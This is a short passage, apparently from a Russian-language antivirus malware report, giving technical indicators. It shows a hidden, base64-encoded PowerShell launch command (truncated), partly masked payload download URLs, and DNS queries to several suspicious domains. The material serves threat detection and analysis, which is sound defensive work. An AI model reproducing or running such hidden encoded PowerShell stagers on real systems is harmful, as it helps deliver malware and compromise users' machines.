Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABMAHkAawBsAGcAdABjAGUAPQAnAFMAawBxAG8AdQBnAGgAeABpAGYAJwA7ACQARABwAGcAZAB1AGwAdgBvAHUAIAA9ACAAJwA4ADUAMAAnADsAJABaAGEAYwBiAGMAYgB1AGMAYwBhAD0AJwBOAGkAZwB3AG8...
- http://ar##d.org/web_map/JEXeWtvyQ/
- http://fu###ruyen.net/sl1eoj4/Pcp/
- DNS ASK ar##d.org
- DNS ASK fu###ruyen.net
- DNS ASK re####resales.com
- DNS ASK re###.#alkdrawer.com
- DNS ASK sa####iouane.com